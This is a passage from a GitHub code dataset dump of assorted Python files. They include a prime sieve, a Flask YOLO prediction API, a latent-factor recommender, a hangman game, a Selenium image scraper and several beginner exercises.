csvfile:\n\treader = csv.DictReader(csvfile)\n\tfor row in reader:\n\t\tif row['fid'] in fids:\n\t\t\tprint(row['title'])\n\t\t\n\n\n\n\n\n\n\n\n\n","repo_name":"dkhlv/404-project","sub_path":"fuzzy_keyword_search.py","file_name":"fuzzy_keyword_search.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"36839908750","text":"import random\nimport string\n\n\ndef sieve_of_eratosthenes(number):\n # sieve of eratosthenes algorithm for finding primes\n # Create a boolean array \"prime[0..n]\" and initialize\n # all entries it as true. A value in prime[i] will\n # finally be false if i is Not a prime, else true.\n prime = [True for _ in range(number + 1)]\n p = 2\n while p * p <= number:\n\n # If prime[p] is not changed, then it is a prime\n if prime[p] is True:\n\n # Update all multiples of p\n for i in range(p * p, number + 1, p):\n prime[i] = False\n p += 1\n\n return [p for p in range(2, number + 1) if prime[p] is True]\n\n\ndef generate_random_word(alphabet, letters=25):\n random_word = []\n random_word_str = []\n reverse_alphabet = {v: k for k, v in alphabet.items()}\n print(reverse_alphabet)\n c_count = 1\n primes = [alphabet[letter] for letter in string.ascii_uppercase]\n random_word.append(primes[0] * primes[1])\n random_word_str.append('AB')\n for index in range(1, len(primes) - 1):\n random_word.append(primes[index] * primes[index + 1])\n random_word_str.append(string.ascii_uppercase[index + 1])\n c_count += 1\n remaining_letters = letters - c_count\n if remaining_letters <= 0:\n return random_word, random_word_str\n random.shuffle(primes)\n previous_prime = alphabet['Z']\n while remaining_letters > 0:\n random_int = random.randint(0, len(primes) - 1)\n random_word_str.append(reverse_alphabet[primes[random_int]])\n random_word.append(previous_prime * primes[random_int])\n previous_prime = primes[random_int]\n remaining_letters -= 1\n return random_word, random_word_str\n\n\ndef main():\n primes = sieve_of_eratosthenes(10000)\n random_p = random.sample(primes, 26)\n random_p.sort()\n print(random_p)\n alphabet_map = {}\n eng_alpha_str = string.ascii_uppercase\n assert len(eng_alpha_str) == 26\n for i in range(26):\n alphabet_map[eng_alpha_str[i]] = random_p[i]\n print(alphabet_map)\n word, word_str = generate_random_word(alphabet_map, 100000)\n print(' '.join(str(num) for num in word))\n print(''.join(c for c in word_str))\n print(len(word), len(''.join(c for c in word_str)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gbouzioto/google_competitions","sub_path":"google_code_jam_2019/qualification_round/problem_3/create_test_data.py","file_name":"create_test_data.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30183221135","text":"\n# Basically I need to write a code that prompts for two numbers (Limit and Copies) and then writes all the numbers from 1 (startvalue) up to and including Limit, Copies number of times and I also need to use nested loops.\n#\n# Then I have to write a function that that prints out a row of numbers separated by tabs, from (startvalue) to and including limit.\n\nlimit = int(input(\"enter your limit \"))\ncopies = int(input(\"enter your copy:\"))\nstart_value = 1\nend_value = 0\nresults = []\nfor copy in range(copies):\n while end_value < limit:\n end_value += 1\n results.append(end_value)\n print(results)\n\n","repo_name":"Favourmbata/python-project","sub_path":"list/nested_loop_two.py","file_name":"nested_loop_two.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19984659107","text":"import os\n\nimport numpy as np\nimport xarray as xr\nimport hvplot.xarray\nimport intake\n\n\nclass CMBData(object):\n _axis_order = ('dec', 'ra')\n\n def __init__(self, catalog_file):\n\n self.catalog_file = catalog_file\n self.catalog = intake.open_catalog(catalog_file)\n\n self._dataset = None\n\n def _get_coord_axes(self, arr, wcs):\n axis0 = wcs.all_pix2world(np.array([[0, i] for i in np.arange(arr.shape[0])]), 0)[:, 1]\n axis1 = wcs.all_pix2world(np.array([[i, 0] for i in np.arange(arr.shape[1])]), 0)[:, 0]\n\n if self._axis_order == ('ra', 'dec'):\n return (axis0, axis1)\n elif self._axis_order == ('dec', 'ra'):\n return (axis1, axis0)\n\n def _get_dataarray(self, source):\n arr = source.read().astype(float)\n wcs = source.wcs\n ra, dec = self._get_coord_axes(arr, wcs)\n return xr.DataArray(arr, dims=self._axis_order,\n coords={'ra': ra, 'dec': dec}, name=source.name)\n\n @property\n def dataset(self):\n if self._dataset is None:\n data_values = {name: self._get_dataarray(src)\n for name, src in self.catalog.items()}\n return xr.Dataset(data_values)\n\n def view(self, name=None, width=1000, height=400, **kwargs):\n if name is None:\n name = list(self.dataset.data_vars.keys())[0]\n if kwargs.get('datashade', False):\n rasterize = False\n else:\n rasterize = True\n image_kwargs = dict(rasterize=rasterize, width=width, height=height)\n image_kwargs.update(kwargs)\n return self.dataset[name].hvplot.image('ra', 'dec', **image_kwargs)\n\n","repo_name":"timothydmorton/pixell_viz","sub_path":"cmbviz/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37747506679","text":"from flask import Flask, request, jsonify, g as app_ctx\nimport io\nimport time\nfrom position_calculator import calculate_position\nimport PIL\nfrom ultralytics import YOLO\n\n\nnavi_app = Flask(__name__)\n\nmodel = YOLO('yolov8n.yaml')\n\nmodel = YOLO('yolov8n.pt')\n\n\n@navi_app.before_request\ndef logging_before():\n app_ctx.start_time = time.perf_counter()\n\n\n@navi_app.after_request\ndef logging_after(response):\n total_time = time.perf_counter() - app_ctx.start_time\n time_in_ms = int(total_time * 1000)\n print('Response time => ', time_in_ms, 'ms')\n return response\n\n\n@navi_app.route('/predict', methods=[\"GET\", \"POST\"])\ndef predict():\n if request.method != \"POST\":\n return \"Please send post request\"\n\n else:\n frame = request.files.get('frame') # get the frame sent by the API request\n im_bytes = frame.read() # convert the file into byte stream\n image = PIL.Image.open(io.BytesIO(im_bytes)) # convert the byte stream into\n image_width, image_height = image.size\n\n prediction = model(image)\n obj_info = []\n for result in prediction:\n for idx, box in enumerate(result.boxes.xywh):\n obj = (result.boxes.cls[idx], box)\n obj_info.append(obj)\n objects_with_positions = calculate_position(obj_info, image_width,\n image_height)\n data = {\n \"objects_with_positions\": objects_with_positions,\n }\n return jsonify(data)\n\n\nnavi_app.run(port=5000, host='0.0.0.0', debug=False)\n","repo_name":"RedMarshmellow/Project-NAVI","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8730874640","text":"\n\n\nimport pandas as pd\nimport os\n\n\nPATH_FROM_TRANSLATE_DESCRIPTION = 'data/output/3_data_translate/da_en_description'\nPATH_FROM_TRANSLATE_SUBJECT = 'data/output/3_data_translate/da_en_subject'\n\n# This is the last file for step 1.\n# Length: 302832\nPATH_FROM_MODELING = 'data/output/1_data_modeling/output_roles.csv'\n\nPATH_FROM_MERGED_DESCRIPTION = 'data/output/4_data_merged/output_description_merged.csv'\nPATH_FROM_MERGED_SUBJECT = 'data/output/4_data_merged/output_subject_merged.csv'\nPATH_FROM_MERGED = 'data/output/4_data_merged/output_merged.csv'\n\n\nclass DataMerged:\n\n def __init__(self):\n\n self.df_description = pd.read_csv(PATH_FROM_TRANSLATE_DESCRIPTION + '/1000_output_en.csv', sep=\",\", quotechar=\"\\\"\", dtype=str)\n self.df_subject = pd.read_csv(PATH_FROM_TRANSLATE_SUBJECT + '/1000_output_en.csv', sep=\",\", quotechar=\"\\\"\", dtype=str)\n self.df_description_merge = pd.DataFrame([], columns=self.df_description.columns)\n self.df_subject_merge = pd.DataFrame([], columns=self.df_subject.columns)\n self.df = pd.read_csv(PATH_FROM_MODELING, sep=\",\", quotechar=\"\\\"\", dtype=str, usecols=[\n 'requestId', 'year', 'day_of_week', 'month', 'hour', 'solution_time', 'last_communication_time', 'derived_completed_time', 'time_bins', 'user', 'responsible_first', 'responsible_last', 'received_by'\n ])\n\n self.run()\n\n\n def run(self):\n\n if not os.path.isfile(PATH_FROM_MERGED_SUBJECT):\n self.checkpoint_merged_subject()\n else:\n self.df_subject = pd.read_csv(PATH_FROM_MERGED_SUBJECT, sep=\",\", quotechar=\"\\\"\", dtype=str)\n print(f'Skip checkpoint_merged(). To rerun delete {PATH_FROM_MERGED_SUBJECT}')\n\n if not os.path.isfile(PATH_FROM_MERGED_DESCRIPTION):\n self.checkpoint_merged_description()\n else:\n self.df_description = pd.read_csv(PATH_FROM_MERGED_DESCRIPTION, sep=\",\", quotechar=\"\\\"\", dtype=str)\n print(f'Skip checkpoint_merged(). To rerun delete {PATH_FROM_MERGED_DESCRIPTION}')\n\n if not os.path.isfile(PATH_FROM_MERGED):\n self.checkpoint_merged()\n else:\n self.df = pd.read_csv(PATH_FROM_MERGED, sep=\",\", quotechar=\"\\\"\", dtype=str)\n print(f'Skip checkpoint_merged(). To rerun delete {PATH_FROM_MERGED}')\n\n\n def checkpoint_merged(self):\n self.df = self.df.drop_duplicates(subset=['requestId'])\n print('Merging: {}'.format(len(self.df)))\n self.df = pd.merge(self.df, self.df_subject, on='requestId', how='left')\n print('Merging: {}'.format(len(self.df)))\n self.df = pd.merge(self.df, self.df_description, on='requestId', how='left')\n print('Merging: {}'.format(len(self.df)))\n self.df.to_csv(PATH_FROM_MERGED, index=False)\n\n\n def checkpoint_merged_subject(self):\n files = os.listdir(PATH_FROM_TRANSLATE_SUBJECT)\n for file in files:\n df = pd.read_csv(f\"{PATH_FROM_TRANSLATE_SUBJECT}/\" + file)\n self.df_subject_merge = pd.concat([self.df_subject_merge, df])\n self.df_subject_merge.to_csv(PATH_FROM_MERGED_SUBJECT, index=False)\n\n\n def checkpoint_merged_description(self):\n files = os.listdir(PATH_FROM_TRANSLATE_DESCRIPTION)\n for file in files:\n df = pd.read_csv(f\"{PATH_FROM_TRANSLATE_DESCRIPTION}/\" + file)\n self.df_description_merge = pd.concat([self.df_description_merge, df])\n self.df_description_merge.to_csv(PATH_FROM_MERGED_DESCRIPTION, index=False)\n\n\nDataMerged()","repo_name":"T0mmy0lsen/IHLP-Helper","sub_path":"backend/saved/pipeline/4_data_merged.py","file_name":"4_data_merged.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44099107620","text":"t_atual = 0\n\ng = { 0 : [1],\n 1 : [2,3],\n 2 : [4,5],\n 3 : [4],\n 4 : [6],\n 5 : [6],\n 6 : [], \n }\n\ndef DFS_VISIT(grafo, s, f):\n global t_atual\n chaves = list(grafo.keys())\n cor = {}\n \n for i in range(len(chaves)):\n cor[chaves[i]] = 'B'\n\n for i in grafo[s]:\n if(f == i and cor[f] == 'B'):\n t_atual = t_atual + 1\n elif(cor[i] == 'B'):\n cor[i] = 'C'\n DFS_VISIT(grafo, i, f)\n cor[s] = 'P'\n\n\nDFS_VISIT(g, 0, 4)\nprint(t_atual)\n'''for i in range(6):\n for j in range(6):\n if(i != j):\n print(\"---------------\" + str(i) + \"-\" + str(j) + \"-----------\")\n DFS(g, i, j)'''\n","repo_name":"LuisAcioly/Grafos","sub_path":"Uri/Prova final/blabluba.py","file_name":"blabluba.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23979325317","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 3 10:14:50 2018\r\n\r\n@author: Darkn\r\n\"\"\"\r\nimport numpy as np\r\nimport random\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import special\r\n\r\n\r\nclass BLFM:\r\n def InitList_movielens(self, filename):\r\n 'initialize each of list of data'\r\n\r\n\r\n self.train = []\r\n self.test = []\r\n with open(filename) as f:\r\n token = ','\r\n if '.dat' in filename:\r\n token = '::'\r\n lines = f.readlines()[1:]\r\n for line in lines:\r\n fields = line.strip().split(token)\r\n self.train.append(fields[:3])\r\n # if random.randint(1,100) > 1:\r\n # self.train.append(fields[:3])\r\n # else:\r\n # self.test.append(fields[:3])\r\n print('reading the data was done!\\nthe length of train is ',len(self.train))\r\n print('length of test is ', len(self.test))\r\n \r\n def __init__(self, filename, N=15):\r\n self.InitList_movielens(filename)\r\n self.F = 10\r\n self.n = N#迭代次数\r\n self.a = 0.01\r\n self.b1 = 2.2\r\n self.b2 = 0.7\r\n self.init()\r\n \r\n def init(self):\r\n 'initialize p,q:p is the dictionary of users-factors;q is the dictionary of items-factors'\r\n self.y = {}\r\n self.e1 = {}\r\n self.e2 = {}\r\n self.U = set()\r\n self.I = set()\r\n self.λ_ = {}\r\n self.λ = {}\r\n for u, i, rui in self.train:\r\n if u not in self.y:\r\n self.y[u] = [round(random.uniform(6, 10),3) for k in range(self.F)]\r\n \r\n if i not in self.e1 :\r\n self.e1[i] = [round(random.uniform(6,10),3) for k in range(self.F)]\r\n self.e2[i] = [round(random.uniform(0.1,2),3) for k in range(self.F)]\r\n \r\n self.λ_.setdefault(u, {}) \r\n self.λ_[u].setdefault(i, [0 for k in range(self.F)])\r\n self.λ.setdefault(u, {})\r\n self.λ[u].setdefault(i, [0 for k in range(self.F)])\r\n self.U.add(u)\r\n self.I.add(i)\r\n \r\n print('initialization has already been completed')\r\n \r\n def DelLFM(self):\r\n del self.a\r\n del self.b1\r\n del self.b2\r\n del self.e1\r\n del self.e2\r\n del self.I\r\n del self.U\r\n del self.y\r\n del self.λ\r\n del self.λ_\r\n print('released the memories')\r\n \r\n def initToVar(self):\r\n '''初始化y的所有值为var'''\r\n for key in self.y:\r\n for k in range(self.F):\r\n self.y[key][k] = self.a\r\n \r\n for key in self.e1:\r\n for k in range(self.F):\r\n self.e1[key][k] = self.b1\r\n \r\n for key in self.e2:\r\n for k in range(self.F):\r\n self.e2[key][k] = self.b2\r\n \r\n \r\n def RecordModel(self):\r\n path = 'BPL2222222'\r\n import os\r\n \r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n q_file = 'q.txt'\r\n p_file = 'p.txt'\r\n test_file = 'test.txt'\r\n q_path = path + '/' + q_file\r\n p_path = path + '/' + p_file\r\n test_path = path + '/' + test_file\r\n print(q_path)\r\n \r\n \r\n file = open(q_path, 'w')\r\n file.write(str(self.q))\r\n file.close()\r\n \r\n file = open(p_path, 'w')\r\n file.write(str(self.p))\r\n file.close()\r\n \r\n file = open(test_path, 'w')\r\n file.write(str(self.test))\r\n file.close()\r\n \r\n print('Recording the model is successful!')\r\n \r\n \r\n def ReadModel(self):\r\n path = 'BPL2222222'\r\n q_file = 'q.txt'\r\n p_file = 'p.txt'\r\n test_file = 'test.txt'\r\n \r\n q_path = path + '/' + q_file\r\n p_path = path + '/' + p_file\r\n test_path = path + '/' + test_file\r\n \r\n \r\n \r\n file = open(q_path, 'r')\r\n qstr = file.read()\r\n self.q = eval(qstr)\r\n file.close()\r\n \r\n file = open(p_path, 'r')\r\n pstr = file.read()\r\n self.p = eval(pstr)\r\n file.close()\r\n \r\n file = open(test_path, 'r')\r\n pstr = file.read()\r\n self.test = eval(pstr)\r\n file.close()\r\n \r\n print('Reading the model is successful!')\r\n \r\n \r\n \r\n \r\n def InitLFM(self):\r\n 'initialize p,q:p is the dictionary of users-factors;q is the dictionary of items-factors'\r\n self.p = dict()\r\n self.q = dict()\r\n for u, i, rui in self.train:\r\n if u not in self.p:\r\n self.p[u] = [round(random.uniform(0,1),3) for x in range(self.F)]\r\n if i not in self.q :\r\n self.q[i] = [round(random.uniform(0,1),3) for x in range(self.F)]\r\n \r\n # print('Initialization of p and q was done!')\r\n\r\n def fit(self):\r\n 'learn the latent factor model return p,q'\r\n No = 1\r\n for step in range(self.n):\r\n \r\n for u, i, r in self.train:\r\n λ_sum = 0\r\n rating = float(r)\r\n\r\n y_sum = sum(self.y[u])\r\n for k in range(self.F):\r\n # print('Y:', y[u][k] / y_sum)\r\n # print('e1:',e1[i][k]**rating)\r\n # print('e2:', e2[i][k]**(5 - rating))\r\n self.λ_[u][i][k] = self.y[u][k]* (self.e1[i][k]**rating) *(self.e2[i][k]**(5 - rating))\\\r\n /(self.e1[i][k] + self.e2[i][k])**5\r\n # print(λ_[u][i][k])\r\n # λ_[u][i][k] = math.exp(exponent)\r\n \r\n λ_sum += self.λ_[u][i][k]\r\n for k in range(self.F):\r\n self.λ[u][i][k] = self.λ_[u][i][k]/λ_sum\r\n \r\n # if No % 80 == 1:\r\n # length = 0\r\n # for i in λ[u]:\r\n # if length > 3:\r\n # break\r\n # else:\r\n # length += 1\r\n # for k in range(F):\r\n # print('λ[%s][%s][%d]='%(u,i,k),end= '')\r\n # print(λ[u][i][k],'=',end = '')\r\n # print(y[u][k],'*pow(',e1[i][k],',',rating,')*pow(',e2[i][k],',',5 - rating,')',end='')\r\n # print('÷',round(y_sum,3),'÷pow(',round(e1[i][k] + e2[i][k],3),',5)')\r\n # print('\\n') \r\n \r\n # 初始化y,e1,e2,给定初值 \r\n self.initToVar()\r\n for u, i, r in self.train:\r\n \r\n rating = float(r)\r\n \r\n for k in range(self.F):\r\n self.y[u][k] += self.λ[u][i][k]\r\n \r\n self.e1[i][k] += self.λ[u][i][k] * rating * 1.1\r\n self.e2[i][k] += self.λ[u][i][k] * (5 - rating)\r\n self.p = {}\r\n self.q = {}\r\n \r\n for u in self.U:\r\n y_sum = sum(self.y[u])\r\n self.p[u] = [0 for i in range(self.F)]\r\n for k in range(self.F):\r\n self.p[u][k] = self.y[u][k]/y_sum\r\n \r\n for i in self.I:\r\n self.q[i] = [0 for i in range(self.F)]\r\n for k in range(self.F):\r\n self.q[i][k] = self.e1[i][k]/(self.e1[i][k] + self.e2[i][k])\r\n # print('y', y[u])\r\n # print(e1[i])\r\n # print(e2[i])\r\n # print('p', p[u])\r\n # print('q', q[i]) \r\n# print(No, ':%.8f|%.8f'%(self.MAE('test'), self.MAE('train')))\r\n yield (step, self.MAE('train'))\r\n # print('%.6f'%MAEAll(p, q))\r\n yield 'finish!!!'\r\n self.DelLFM()\r\n \r\n def Predict(self, u, i):\r\n 'calcuate the predict of user to item'\r\n Sum = 0\r\n# print(self.p[u] ,self.q[i])\r\n for f in range(self.F):\r\n Sum += self.p[u][f] * self.q[i][f]\r\n return Sum * 5\r\n \r\n def RMSE(self):\r\n 'Score prediction Method of RMSE'\r\n Sum = 0\r\n Variance = 0\r\n for u, i,rui in self.test:\r\n if u in self.p and i in self.q:\r\n pr = self.Predict(u, i)\r\n Variance = float(rui) - float(pr)\r\n # if Variance > 5 or Variance < -5:\r\n # print('rui=',rui,' pr=',pr)\r\n # print('Variance =',Variance)\r\n Sum += Variance * Variance\r\n # print(Sum)\r\n # print(len(test))\r\n return math.sqrt(Sum/len(self.Test))\r\n \r\n def MAE(self, style='test'):\r\n 'Score prediction Method of MAE'\r\n Sum = 0\r\n count = 0\r\n if style == 'test':\r\n for u, i, rui in self.test:\r\n if u in self.p and i in self.q:\r\n Sum += math.fabs(float(rui) - self.Predict(u, i))\r\n count += 1\r\n# print((rui) ,':',self.Predict(u, i))\r\n return Sum/count\r\n else:\r\n for u, i, rui in self.train:\r\n if u in self.p and i in self.q:\r\n Sum += math.fabs(float(rui) - self.Predict(u, i))\r\n count += 1\r\n # print(math.fabs(float(rui) - self.Predict(u, i)))\r\n return Sum/count\r\n \r\n def setEvalPara(self,N = 10):\r\n '推荐列表长度,通常top10'\r\n self.N = N+1\r\n self.item_test_all = set()\r\n self.user_test_all = set()\r\n for u, i, r in self.test:\r\n self.item_test_all.add(i)\r\n self.user_test_all.add(u)\r\n print('评估参数设置完成!')\r\n \r\n \r\n def setN(self,N):\r\n self.N = N+1\r\n\r\n\r\n def TopN(self, user, choice = 'WITH_RATING'):\r\n \r\n user_item = []\r\n if choice == 'WITH_RATING':\r\n for i in self.item_test_all:\r\n if i in self.q:\r\n \r\n r = self.Predict(user, i)\r\n user_item.append((i,r))\r\n return set([elem[0] for elem in (sorted(user_item, key=lambda item:item[1])[:self.N])])\r\n else:\r\n for i in self.item_test_all:\r\n if i in self.q:\r\n \r\n r = self.Predict(user, i)\r\n user_item.append((i,r))\r\n return sorted(user_item,key = lambda item:item[1])[:self.N]\r\n \r\n \r\n def setTestUI(self):\r\n '在测试集上得到用户和物品的集合'\r\n self.item_test_all = set()\r\n self.user_test_all = set()\r\n for u, i, r in self.test:\r\n self.item_test_all.add(i)\r\n self.user_test_all.add(u)\r\n \r\n \r\n def Coverage(self):\r\n item_len = set()\r\n for u in self.user_test_all:\r\n item_list = self.TopN(u)\r\n for item in item_list:\r\n item_len.add(item[0])\r\n print('覆盖率', len(item_len)/len(self.item_test_all))\r\n\r\n def Precision(self):\r\n user_list = {}\r\n for u, i, r in self.test:\r\n if u not in user_list:\r\n user_list[u] = []\r\n user_list[u].append((i, r))\r\n else:\r\n for index, item in enumerate(user_list[u]):\r\n if item[1] < r:\r\n user_list[u].insert(index, (i, r))\r\n if(len(user_list[u]) > self.N-1):\r\n user_list[u].pop(len(user_list[u])-1)\r\n break \r\n for u in self.user_test_all:\r\n hit = 0\r\n n_precision = 0\r\n rec_list = self.TopN(u)\r\n# print([elem[0] for elem in user_list[u]])\r\n rec_set = set(elem[0] for elem in rec_list)\r\n user_set = set([elem[0] for elem in user_list[u]])\r\n# if not len(user_set) < self.N:\r\n \r\n hit += len(user_set&rec_set)\r\n n_precision += self.N\r\n print('hit:', hit)\r\n print('准确率', hit/n_precision)\r\n\r\n \r\n def getItem_dict(self):\r\n self.item_dict = {}\r\n for u, i, r in self.test:\r\n if i not in self.item_dict:\r\n self.item_dict[i] = set()\r\n self.item_dict[i].add(u)\r\n \r\n \r\n def similarity(self, item_1, item_2):\r\n length_12 = len(self.item_dict[item_1] & self.item_dict[item_2])\r\n if length_12 == 0:\r\n return 0\r\n else:\r\n return length_12/math.sqrt(len(self.item_dict[item_1]) * len(self.item_dict[item_2]))\r\n \r\n \r\n def Diversity(self):\r\n self.getItem_dict()\r\n rec_set = set()\r\n pop_set = set()\r\n sim_dict = {}\r\n diver_all = 0 #总的多样性\r\n \r\n for u in self.user_test_all:\r\n rec_set = self.TopN(u)\r\n diversity = 0 #每个用户推荐列表的多样性\r\n for i1 in rec_set:\r\n pop_set.add(i1) #将遍历过的元素加入pop_set里\r\n for i2 in rec_set - pop_set: #将没遍历过的元素的集合进入第二次迭代当中\r\n if i1 < i2:\r\n tpl = (i1, i2)\r\n else:\r\n tpl = (i2, i1)\r\n if tpl not in sim_dict:\r\n sim_dict[tpl] = self.similarity(i1, i2)\r\n diversity += sim_dict[tpl]\r\n u_list = len(rec_set)\r\n diver_all += 1 - diversity * 2 / u_list * (u_list - 1)\r\n diver_all /= len(self.user_test_all)\r\n print('多样性:', diver_all)\r\n","repo_name":"darknli/recommend","sub_path":"prob_lfm.py","file_name":"prob_lfm.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8284840423","text":"# https://leetcode.com/problems/binary-tree-level-order-traversal/\n\n# Given the root of a binary tree, return the level order traversal of its nodes' values. (i.e., from left to right, level by level).\n\n# Example 1:\n# Input: root = [3,9,20,null,null,15,7]\n# Output: [[3],[9,20],[15,7]]\n\n# Example 2:\n# Input: root = [1]\n# Output: [[1]]\n\n# Example 3:\n\n# Input: root = []\n# Output: []\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nfrom collections import deque\n\nclass Solution:\n def levelOrder(self, root):\n result = []\n \n if root is None:\n return result\n\n queue = deque()\n queue.append(root)\n\n while queue:\n level_size = len(queue)\n current_level = list()\n for i in range(level_size):\n current_node = queue.popleft() # Same thing as poping the first element \n current_level.append(current_node.val)\n\n if current_node.left:\n queue.append(current_node.left)\n\n if current_node.right:\n queue.append(current_node.right)\n\n result.append(current_level)\n\n return result\n\n\n# Time complexity: O(n), where n is the total number of nodes\n# Space Complexity: O(n), where n is the total number of nodes","repo_name":"bolu-tife/Data-Structures-and-Algorithms","sub_path":"Tree Breadth First Search/level_order_traversal.py","file_name":"level_order_traversal.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42807622637","text":"field_size = int(input())\n\nmatrix = []\nbunny_pos = []\nbest_path = []\n\nbest_direction = None\nmax_eggs_collected = 0\n\ndirections = {\n 'up': (-1, 0),\n 'down': (1, 0),\n 'left': (0, -1),\n 'right': (0, 1),\n}\n\nfor row in range(field_size):\n matrix.append(input().split())\n\n if 'B' in matrix[row]:\n bunny_pos = [row, matrix[row].index('B')]\n\nfor direction, pos in directions.items():\n row, col = [\n bunny_pos[0] + pos[0],\n bunny_pos[1] + pos[1]\n ]\n\n path = []\n eggs_collected = 0\n\n while 0 <= row < field_size and 0 <= col < field_size:\n if matrix[row][col] == 'X':\n break\n\n eggs_collected += int(matrix[row][col])\n path.append([row, col])\n\n row += pos[0]\n col += pos[1]\n\n if eggs_collected >= max_eggs_collected:\n max_eggs_collected = eggs_collected\n best_direction = direction\n best_path = path\n\nprint(best_direction)\nprint(*best_path, sep='\\n')\nprint(max_eggs_collected)\n","repo_name":"vncmd/SoftUni-Python-Advanced-OOP","sub_path":"[0] Python Advanced/[1.4] Multidimensional Lists/[2] Multidimensional Lists - Exercises 2/04_easter_bunny.py","file_name":"04_easter_bunny.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73924554027","text":"import random\nfrom hangmanArt import logo \nfrom hangmanArt import stages \nfrom hangmanWord import word_list\n\nendOfGame = False\nlives = 6\n\nprint(logo)\n\nchosenWord = random.choice(word_list) \n\nguessWordsList = []\n\nfor letter in chosenWord:\n guessWordsList.append('_') \n\nwhile not endOfGame:\n \n guess = input(\"Enter a letter to guess the word : \").lower()\n if guess in guessWordsList:\n print(\"You have already Guessed this letter\")\n else:\n for index in range(len(chosenWord)):\n if chosenWord[index] == guess:\n guessWordsList[index] = guess\n \n if guess not in chosenWord:\n lives = lives-1\n if lives == 0:\n endOfGame = True\n print(\"you loose\")\n \n print(f\"{''.join(guessWordsList)}\")\n \n if '_' not in guessWordsList:\n endOfGame = True\n print(\"You Won\\n\") \n print(guessList)\n\n print(stages[lives])\n","repo_name":"ssrishi/pythonPoject","sub_path":"hangmanGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73607466667","text":"import os\r\nimport urllib\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom time import sleep\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n# 폴더 생성\r\n\r\nkeyword = \"도서관\"\r\n\r\nif not os.path.exists(keyword):\r\n os.makedirs(keyword)\r\n\r\nquery = keyword\r\n\r\nurl = f\"https://www.google.com/search?q={query}&tbm=isch\"\r\ndriver = webdriver.Chrome()\r\ndriver.get(url)\r\n\r\nSCROLL_PAUSE_TIME = 1\r\n# Get scroll height\r\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\r\n\r\nnew_height = 0\r\n\r\nwhile True:\r\n # Scroll down to bottom\r\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n # Wait to load page\r\n sleep(SCROLL_PAUSE_TIME)\r\n # Calculate new scroll height and compare with last scroll height\r\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\r\n if new_height == last_height:\r\n try:\r\n # 결과 더보기 버튼이 나타날 때까지 대기\r\n more_button = WebDriverWait(driver, 10).until(\r\n EC.presence_of_element_located((By.CSS_SELECTOR, \".mye4qd\"))\r\n )\r\n more_button.click()\r\n sleep(2)\r\n except:\r\n break\r\n last_height = new_height\r\n\r\nimg_elements = driver.find_elements(By.CSS_SELECTOR,\".rg_i\")\r\n\r\nfor i, img in enumerate(img_elements):\r\n print(f\"{query} : {i+1}/{len(img_elements)} proceed...\")\r\n try:\r\n image_xpath = f'//*[@id=\"islrg\"]/div[1]/div[{i+1}]/a[1]/div[1]/img'\r\n\r\n image_element = WebDriverWait(driver, 3).until(\r\n EC.presence_of_element_located((By.XPATH, image_xpath))\r\n )\r\n image_element = driver.find_element(By.XPATH,image_xpath)\r\n image_url = str(image_element.get_attribute(\"src\"))\r\n urllib.request.urlretrieve(image_url, str(f\"{keyword}/library_han_{i}.jpg\"))\r\n sleep(1)\r\n print(f\"img {i} done\")\r\n except:\r\n print(f\"error {i}\")\r\n print(type(image_element))\r\n print(type(image_url))\r\n sleep(0.5)\r\n\r\n\r\n# 웹 드라이버 종료\r\ndriver.quit()\r\n","repo_name":"JeonSuHyeong/google_crawling","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15227902677","text":"abc={\r\n 'a':1,\r\n 'b':2,\r\n 'c':3,\r\n 'd':4\r\n}\r\nq=13\r\nT='cabcadcadbacadcbacacad'\r\nP='baca'\r\nT1=''\r\nfor i in T:\r\n s=str(i)\r\n T1+=str(abc[s])\r\nP1=''\r\nfor x in P:\r\n P1+=x.replace(x,str(abc[x]))\r\ncomp1=int(P1)%13\r\ncounter=0\r\nfor z in range(len(T)-len(P)+1):\r\n comp2=T1[counter]+T1[counter+1]+T1[counter+2]+T1[counter+3]\r\n if int(comp2)%13==comp1:\r\n if P1==comp2:\r\n 